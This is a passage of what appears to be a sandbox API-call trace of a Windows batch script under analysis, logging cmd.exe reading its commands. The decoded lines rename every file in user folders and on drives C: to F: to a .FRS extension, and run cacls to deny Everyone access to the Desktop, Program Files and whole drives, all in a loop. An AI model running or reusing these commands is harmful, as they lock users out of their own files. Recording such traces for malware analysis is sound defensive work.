cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0104.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.549] GetFileType (hFile=0x318) returned 0x1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0104.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0104.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0104.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.549] GetFileType (hFile=0x318) returned 0x1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0104.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0104.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0104.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.549] GetFileType (hFile=0x318) returned 0x1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0104.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0104.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0104.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.550] GetFileType (hFile=0x318) returned 0x1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0104.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0104.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0104.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.550] GetFileType (hFile=0x318) returned 0x1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0104.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0104.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0104.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.550] GetFileType (hFile=0x318) returned 0x1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0104.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0104.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0104.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.550] GetFileType (hFile=0x318) returned 0x1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0104.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0104.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0104.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0104.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.550] GetFileType (hFile=0x318) returned 0x1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0104.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0104.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0104.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.551] GetFileType (hFile=0x318) returned 0x1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0104.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0104.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0104.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.551] GetFileType (hFile=0x318) returned 0x1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0104.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0104.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0104.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.551] GetFileType (hFile=0x318) returned 0x1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0104.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0104.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0104.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.551] GetFileType (hFile=0x318) returned 0x1 [0104.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0104.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0104.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0104.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.552] GetFileType (hFile=0x318) returned 0x1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0104.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0104.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0104.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.552] GetFileType (hFile=0x318) returned 0x1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0104.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0104.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0104.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.552] GetFileType (hFile=0x318) returned 0x1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0104.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0104.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0104.552] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.552] GetFileType (hFile=0x318) returned 0x1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0104.552] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.552] SetFilePointer (in: hFile=0x318, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0104.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0104.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.553] GetFileType (hFile=0x318) returned 0x1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0104.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0104.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0104.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.553] GetFileType (hFile=0x318) returned 0x1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0104.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0104.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0104.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.553] GetFileType (hFile=0x318) returned 0x1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0104.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0104.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0104.553] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.553] GetFileType (hFile=0x318) returned 0x1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0104.553] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0104.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0104.553] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0104.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.554] GetFileType (hFile=0x318) returned 0x1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0104.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0104.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0104.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.554] GetFileType (hFile=0x318) returned 0x1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0104.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0104.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0104.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.554] GetFileType (hFile=0x318) returned 0x1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0104.554] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0104.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0104.554] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.554] GetFileType (hFile=0x318) returned 0x1 [0104.554] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 